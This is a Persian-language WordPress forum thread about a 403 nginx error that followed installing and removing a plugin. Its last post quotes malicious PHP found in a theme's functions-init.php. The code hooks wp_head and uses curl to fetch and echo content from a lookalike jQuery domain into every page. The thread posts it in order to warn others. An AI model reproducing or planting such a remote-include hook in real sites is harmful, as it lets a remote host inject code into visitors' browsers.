انجمن

ارور 403 در هدر بعد از نصب افزونه  (۵ نوشته)

• rezaee415

آفلاین
    عضو
    تعداد نوشته‌ها: ۶
    # نوشته شده: ۱۰ سال پیش
    ۲ مرداد ۱۳۹۲ - ۱۲:۵۴

سلام، من تو انجمن گشتم ولی کسی در رابطه با این مشکل چیزی پیدا نکردم، چند روز پیش چند تا افزونه نصب کردم ولی خب ازشون خوشم نیومد و پاک کردم
    بعد از نصب یکی از افزونه ها که فکر میکنم افزونه Blogomatic بود، بالای قسمت مدیریت وردپرس نوشته ای با این مضمون که اومد:

افزونه هنگام فعال شدن٬ 1 نویسه از یک خروجی غیرمنتظره تولید کرد. اگر با پیغام خطای “headers already sent”٬ مشکلات مربوط به خوراک و یا مسائل دیگر مواجه شدید سعی کنید افزونه را غیرفعال یا حذف کنید.

منم بعدش افزونه رو پاک کردم اما حالا بالای هدر سایتم مینویسه Forbidden 403 nginx
    سایتم: http://www.riseh.ir
    ممنون میشم اگه راهنمایی کنید؛ من تو وردپرس تازه کارم

• mahy

آفلاین
    عضو
    تعداد نوشته‌ها: ۲۶
    ۲ مرداد ۱۳۹۲ - ۱۳:۱۸

این کار رو امتحان کن اگه واردی
    ممکنه افزونه ای که نسب کردی توی پایگاه داده ها قسمت phpmyadmin یک جدولی رو درست کرده باشه ، می ری می چرخی جدول مربوطه رو فقط جدول که به افزونه ربط داره رو پاک می کنی قبلش هم که افزونه رو پاک کردی

یه امتحان بکن ببین مشکلت برطرف می شه

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    rezaee415
  • rezaee415

آفلاین
    عضو
    ۳ مرداد ۱۳۹۲ - ۱۲:۴۰

ممنون که راهنمایی کردی
    من رفتم توی جداول، ولی جدولی با نام اون افزونه پیدا نکردم، اگر هم باشه اسمش مشابه افزونه نیست، حتی دوباره افزونه رو نصب کردم ولی جدولی اضافه نشد
    نام افزونه 1.0 blogomatic و نسخه وردپرس من 3.5.2 هست اگه بیشتر راهنمایی کنین ممنون میشم

• rezaee415

آفلاین
    عضو
    ۹ مرداد ۱۳۹۲ - ۰۱:۱۶

بچه ها من یک تیبل با نام wp_aq پیدا کردم از این نمیتونه باشه؟
    ممکنه توی کد هدر، کدی رو وارد کرده باشه که باید پاکش کنم؟

• rezaee415

آفلاین
    عضو
    ۱۹ مرداد ۱۳۹۲ - ۰۰:۰۳

سلام، مشکل سایتم حل شد، از همتون ممنون
    با کمک دوستان عزیز وردپرسی، توی کدهای قالب یک کد ناآشنا که فکر میکنم مخرب و مربوط به هک میشد پیدا کردم و پاکش کردم.
    این کد توی فایلی به نام functions-init.php در پوشه includes در پوشه قالبم بود، لطفا توی قالب هایی که از سایتهای مختلف حتی معتبر دانلود میکنید نهایت دقت رو داشته باشید.
    کد:
    <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

درباره‌ی این موضوع